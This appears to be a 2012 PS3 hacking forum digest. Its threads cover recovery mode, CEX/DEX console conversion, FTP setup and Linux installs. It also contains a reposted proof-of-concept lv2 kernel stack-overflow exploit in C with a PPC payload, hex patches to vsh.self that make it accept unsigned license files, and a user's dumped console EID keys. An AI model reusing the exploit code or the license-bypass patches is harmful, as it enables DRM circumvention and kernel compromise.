Crunching the Latest PS3 Scene News! - PS3 Technical Only Topics

help to enter Recovery Mode on Rogero 3.55 CEX CFW v3.6

thien — Tue, 06 Nov 2012 15:25:47 GMT

Hi all

Why I can't enter Recovery Mode on Rogero 3.55 CEX CFW v3.6, i've tried many times still no luck,
I want to return OFW 3.55 then go to REBUG 3.55.3 REX
please help

a. Turn off PlayStation 3.
b. Turn it on and keep Holding The power button down; The system will turn on BUT DON'T turn off once again.
c. Once the System has been shutdown, Turn it on again and keep Holding The power button down (you will hear 1 beep first, keep holding) until you hear 2 consecutive beeps
d. When you hear the 2 beeps take finger off power button.
e. You will be prompted to plug in your controller via usb and then hit the PS button
f. The Recovery menu will pop up.
g. Last Option #6 is what you must use "System Update"

430 vsh.self decrypted by me

PatrickBatman — Wed, 31 Oct 2012 20:05:42 GMT

4.30 VSH.elf

https://anonfiles.com/file/73e5de938...771b7d89e12951

Old way to patch vsh.self was:

Dont know this still applies:

patch 8byte in vsh.self for reActPSN==========================================
version addr old data new data function
3.55retail 0x30b230 4b cf 5b 45 -> 38 60 00 00 // fixed allow unsigned act.dat *.rif
3.55retail 0x30ac90 48 31 b4 65 -> 38 60 00 00 // fixed act.dat missing after reboot

3.55debug 0�312308 4b ce ea 6d -> 38 60 00 00 // fixed allow unsigned act.dat *.rif
3.55debug 0x311d68 48 31 b7 d5 -> 38 60 00 00 // fixed act.dat missing after reboot

3.41retail 0x305dc4 4b cf af b1 -> 38 60 00 00 // fixed allow unsigned act.dat *.rif
3.41retail 0�305824 48 31 43 ad -> 38 60 00 00 // fixed act.dat missing after reboot

3.41debug 0x30cedc 4b cf 3e 99 -> 38 60 00 00 // fixed allow unsigned act.dat *.rif
3.41debug 0x30c93c 48 31 47 1d -> 38 60 00 00 // fixed act.dat missing after reboot

==============patch vsh.self by youself for new CFW=====
run dev_blind
copy /dev_blind/vsh/module/vsh.self to d:/vsh/vsh.self.0
cd d:/vsh
unself vsh.self.0 vsh.self.elf

hexedit vsh.self.elf
if *(addr)==old data then *(addr)=new data
only 2 addr, 8byte data fixed in one vsh.self.elf

self_rebuilder vsh.self.elf vsh.self vsh.self.0
copy vsh.self to /dev_blind/vsh/module/vsh.self

Need help on FTP

nemo — Wed, 31 Oct 2012 10:20:20 GMT

Hi guys, need help for FTP of file from PS3 to Pc. I use fillezilla and do all those step of tutorial but i still get connection timed out, what did i do wrong? Have two local connection, one to PS3 and the other to router. Please help.

Internet protocol version 4

Local Area connection
use the following IP address
10.1.1.1
255.255.255.0
10.1.1.0

Use the following DNS server addresses
10.1.1.100

Ps3
MMCM FTP is enable (no timeout)

PS: Do i need to use blackbox? Any tutorial for it?

Where's the dump TB disks tutorial?

Beibars — Wed, 31 Oct 2012 00:41:31 GMT

Hey guys, I remember a tutorial on how to dump TB disks by Grav0x, but can't seem to find it, can someone help me here?

I need it since I updated to 4.30 CFW and obviously my Resistance 3 TB disk isn't going to work, so I'm looking for a method of dumping and decrypting the disk. I already tried PS3GEN tools on the disk, but it can't read nor decrypt it.

Desperate for help!! cant dump eEID_root Key. DEX to CEX QAQ begging for help TAT

demonHannah — Sun, 28 Oct 2012 19:12:53 GMT

Hey I'm currently in a DEX 3.55 Roger CFW.
I was trying to get back to CEX. However, I lost my CEX flash [ due to my flash drive being stolen/lost

I'm trying to get back CEX using following method, by gDrive

http://www.ps3crunch.net/forum/print...3&pp=10&page=2

However, I was not get my root key by flatz's EID root key application RKDumper... it goes black screen forever (without any usb plug in while starting the application
I've tried several DEX MFW, but it doesn't work. still black screen forever. I almost not sleep.
Then I was trying to install linux system to my DEX, but failed...

I what I can know. is use mM or MemDump to dump flash/lv1.lv2 dump. eEID storage dump, flash storage dump.

I can provide my dex flash bin if needed...

I dont wanna stay in DEX forever..
HELP TAT, any help is much appreciated!!!!

************************************************** ******
OK so I installed the xmb eeid dumper, I have about 6 files only one is 48 bytes

I got following

Microsoft Windows [ 6.1.7600]

C:\Users\Administrator>cd C:\

C:\>c2d.exe EID4.bin DEX.NORBIN Cex.bin.NORBIN 84
Can't find openssl.exe in c:\openssl\bin or d:\openssl\bin

C:\>c2d.exe EID4.bin DEX.NORBIN Cex.bin.NORBIN 84

EID key : 48 bytes (EID4.bin)
Flash size : 16 MB NOR (DEX.NORBIN)
Target ID : $82

EID ROOT KEY: D6359F1A41B1BD0FE9E548E9EBFE453216676E22E4BF46CB55 42A24646568887
EID ROOT IV : BA9409B91BDFC8CA66DCB15D60D44B12

EID0 KEY : B8CC5AC7CA9D14B4B64C3F43EDA4CF1566AA8EC65C73B98B18 F5C796E117935A
EID0 IV : DF245C978DE12FBB6D49A80F1329C0B0

EID0 SEC KEY: A315A0487B519E0DDA940870A464C3E1

ERROR: Cannot decrypt EID0 SECTION!

C:\>

Debugging tools

*M* — Wed, 24 Oct 2012 01:55:48 GMT

Hi Crunch Team

I've been following the scene for a while now but only recently got a PS3 and would like to start doing some debugging and coding on it, Unfortunately it's 4.25 but I'd like to start studying the firmware files for now anyway. Most of my experience is in debugging x86/win32 so I imagine there will be a bit of a learning curve familiarizing myself with the relevant PPC instructions.

The devwiki looks like a great resource but any other recommended info/documentation would be appreciated thanks!

Installing Linux Problem

otherchris — Mon, 22 Oct 2012 12:20:44 GMT

Hi there,

I'm trying to install red_ribbon_rc6 on me 3.55 ps3.
I have encountered TOO many problems to count and right now i have gotten up to the part where i am in petitboot mode and have entered "cd /tmp/petitboot/mnt/sda1/"
and "./create_hdd_region.sh", but when i re-reboot it just gives me the same options of "boot gameOS, Set video mode and exit to shell".
What on earth can i do? I am using a Fat NOR and on rebug 3.55.2 20gig partition.

The Problem has something to do with this:

So when i have written cd /tmp/petitboot/mnt/sda1/
and ./create_hdd_region.sh My screen should look like this-
38888d1350906126-killing-me-please-help-should-look-like-.png

But it looks like this-
38889d1350906288-killing-me-please-help-dsc00957.jpg

Any ideas?
Thanks

Attached Images

38889d1350906288-killing-me-please-help-dsc00957.jpg (291.8 KB)
38888d1350906126-killing-me-please-help-should-look-like-.png (54.0 KB)

New homebrew release: REQUEST IDPS Generator - v1.0.0.0 by Rnd

Abkarino — Tue, 16 Oct 2012 10:21:20 GMT

Hello,
Long time ago when CEX2DEX story started by Math, he asked every body want to convert its console from retail console [CEX] to debug/test console [DEX] to send him some info from this console using the leaked ObjectiveSuite tools to be able to generate IDPS_REQUEST.txt file required to convert our consoles to DEX using this tools via Sony's official servers, since he was able to access this servers to generate the required files.

Attachment 3400

Today PlayStation 3 homebrew developer Rnd (aka RndRandomizer) has released a Request IDPS Generator version 1.0.0.0 with details below.

Quote:

From the ReadMe file: REQUEST IDPS Generator - v1.0.0.0 - Rnd

v1.0.0.0:

Initial Release

Features:

Generate a request_idps file
Get PerConsole Data (board ID, cid, ecid, kiban ID, ckp2_data, ckp_management_id)

Usage:

Just get your NAND/NOR dump and drop it in this application.

No more need for re-flashing the whole dump in order to convert EID.

Simply it makes it easier to use it with ObjectiveSuites-SetIdps and you dont have to gether it from Sony's server.

Put request_idps.txt in Temp folder in ObjectiveSuites, to set your request_idps and you are done with flashing the new EID.

I'm not responsible for ANY DAMAGE it may cause! USE AT YOUR OWN RISK!

P.S. If somebody has a script to get the EID with ObjectiveSuites, I would be very kind if you could let me know, I will update the application.

Sincerely,
Rnd

Contact me at RndRandomizer

Download: PS3 Request IDPS Generator v1.0.0.0.

Source: PS3News.

60 gig launch console just died :-(

zomble — Sat, 06 Oct 2012 02:52:19 GMT

My 60 gig ps3 that i got as soon as it launched has just given up on live and turned off and flashed a red light.

Is there anyway to fix this ?

if not buying a new one i have no issue with, as long as i can get my save games back.

If i take the hd out of my dead ps3 and plug it into a computer and backup all the files will i be able to plug it into the usb port on a new ps3 and copy my save games onto it?

And all my PS+ files do i just have to re download those?

aaannnddd my sleeping dogs disc is still in this PS3, i read that if youhold down eject and turn it on and tap eject the disc should spit out, it dosnt do that for me

Naehrwert released PS3 LV2_Kernel Exploit Sample Implementation

Abkarino — Thu, 20 Sep 2012 15:20:00 GMT

Today the well known PS3 Developer/Hacker Naehrwert known for his great tools like SCETool and Libeid and also for his reverse engineering work in PS3 System, had made a blog post about Lv2 exploiting, that will work in all current firmwares till the last one from Sony OFW4.25.

To quote from his blog:

Quote:

A long while ago KaKaRoTo pointed me to a stack overflow he found while reversing lv2_kernel. But there are two problems:

The vulnerability is in a protected syscall (the SELF calling it got to have the 0�40… control flags set). So you’d first need to find a suitable usermode exploit (don’t ask us), that gives you code execution with the right privileges.[/INDENT]
The payload data is copied to lv2 heap first and the function will do a free call on it before the payload has any chance to get executed. This might not sound like a problem but it looks like lv2′s heap implementation will overwrite the free’ed space with 0xABADCAFE and thus destroy the payload.[/INDENT]

Here is my sample implementation for 3.41 lv2_kernel (although the vulnerability should be present in all versions of lv2 up to the latest firmware), maybe someone of you will find a way to overcome problem (2.) and can get something nice out of it because right now it’s only good to crash lv2.

And this is his PS3 LV2_Kernel Exploit sample implementation:

Code:

/*

* lv2 sys_mount stack overflow

* Original finder: KaKaRoTo (thank you for pointing it out!)

* Note: all offsets/values/addrs in this source are 3.41 specific

*/



#include 

#include 

#include 



/*

unk2, unk3 is what we're going to use here.

lv2 will handle unk2, unk3 like this:

char *strlist[FIXED_SIZE]; //On stack.

for(i = 0; i < unk3; i++)

        strlist[i] = strdup_from_uspace(*unk2++);

*/

static s64 sys_mount(const char *dev /*r3*/, const char *fs /*r4*/, const char *path /*r5*/, 

        u64 unk0 /*r6*/, u64 wp /*r7*/, u64 unk1 /*r8*/, const char **unk2 /*r9*/, u64 unk3 /*r10*/)

{

        lv2syscall8(837, (u64)dev, (u64)fs, (u64)path, 

                (u64)unk0, (u64)wp, (u64)unk1, (u64)unk2, (u64)unk3);

        return_to_user_prog(s64);

}



//For testing.

static void patch_access_check()

{

        //check_access @ 0x80000000000505D0

        //li r3, 1 ; blr

        lv2syscall2(7, 0x80000000000505D0ULL, 0x386000014E800020ULL);

        printf("[*] DEBUG: access check patched.\n");

}



int main(int argc, const char **argv)

{

        //Problem: The mount syscall needs the 0x40 ctrl flag (root) to be set.

        //Solution: Find a usermode exploit in a SELF that has them set.

        

        //Patch the ctrl flags check for testing.

        patch_access_check();

        

        //Nop.

        char nop[] = "X";

        

        //Payload.

        char payload[] = 

        {

                //Insert valid PPC code here (without 0x00 bytes)

                //and hope lv2 heap 0x27 is executable and 0x04 aligned.

                0x38, 0xE0, 0x7E, 0xF0, //li r7, 0x7EF0

                0x38, 0xE7, 0x01, 0x10, //addi  r7, r7, 0x110

                0x78, 0xE7, 0x83, 0xE4, //sldi  r7, r7, 16

                0x78, 0xE7, 0x07, 0xC6, //sldi  r7, r7, 32

                0x60, 0xE7, 0x91, 0x34, //ori   r7, r7, 0x9134

                0x7C, 0xE9, 0x03, 0xA6, //mtctr r7            ; 0x8000000000009134 (sys_sm_shutdown)

                0x38, 0x60, 0x02, 0x10, //li    r3, 0x210

                0x38, 0x63, 0xFF, 0xF0, //addi  r3, r3, -0x10 ; 0x200 (reboot)

                0x7C, 0x84, 0x22, 0x78, //xor   r4, r4, r4    ; 0

                0x7C, 0xA5, 0x2A, 0x78, //xor   r5, r5, r5    ; 0

                0x7C, 0xC6, 0x32, 0x78, //xor   r6, r6, r6    ; 0

                0x4E, 0x80, 0x04, 0x20, //bctr

                //End of payload.

                0x00

        };

        

        //List containing the entries.

        //stack frame size is 0x1C0

        //strlist = framptr + 0xE0

        //remaining stack frame size is 0xE0 (28 * 8)

        #define LIST_LENGTH (28 + 2 + 1)

        const char *list[LIST_LENGTH] = 

        {

                //-0xE0

                //Overwrite stack with nop entries (0xE0 bytes).

                nop, nop, nop, nop, nop, nop, nop, nop, //0x40

                nop, nop, nop, nop, nop, nop, nop, nop, //0x80

                nop, nop, nop, nop, nop, nop, nop, nop, //0xC0

                nop, nop, nop, nop,

                //0x00

                //Fill 0x10 bytes to reach saved r0.

                nop, nop,

                //+0x10

                //Overwrite saved r0 with a pointer to our payload.

                payload

        };

        

        //Doit!

        printf("[*] Taking the plunge...\n");

        s64 res = sys_mount("FOO", "BAR", "XXX", 0, 0, 0, list, LIST_LENGTH);

        printf("[*] Error: sys_mount returned (res = 0x%016lX).\n", (u64)res);

        

        return 0;

}

Thanks for Naehrwert for posting this info and also thanks for KaKaRoTo for original exploit finding.

News Source:
Naehrwert Blog
PS3News

Debugging full games + sniffing

zadow28 — Mon, 17 Sep 2012 18:56:16 GMT

i moved the thread here

i just think there are other ways also to do it like full game debugging.

I research this option myself , and i can see also there are ways to to optain the decrypted eboot several ways.

I really played around today, and i manages to get full game debugging.

And that havent been done as yet

It always have frustrateted me that you couldent debugg retail eboots/games

Normally when loading just fself in debugger, is just nothinh happends.

So i played around.

here is an small tut.

First reset in debugger mode.

locate the eboot.bin decrypt it, and resign with Fself one.

then in target manager set app_home to the BLES or BLUS folder.

reset target

Then load executable then locate the eboot.bin

load it

then open Tuner from the SDK.

then load executable there also .

when you do this you get kicked to the ps3 debugger.

then in debugger you press go under options ..

concrats you are debugging full game .

movie intro

Attachment 3312

gameplay

Attachment 3313

also on the ps3 you can play the game under debugger mode .

since eboots stays in ram to the next is loaded the intire game can be debugged.

so there for only the eboot have to be decrypted and not the sprx if the game os needed off that

just since an monkey like me can figure it out so can you.

PS when the debugging starts you can sniff with "software."

even works on 4.11 games but prepare for huge files like 1 gb when sniffing, so hope for any good suggestions.

really dont care about war on sites, just help eachother

funny shit is that you can debugg both TB and cobra this way, all the updates an dongle updaters, just wised that dex was around before :(

regards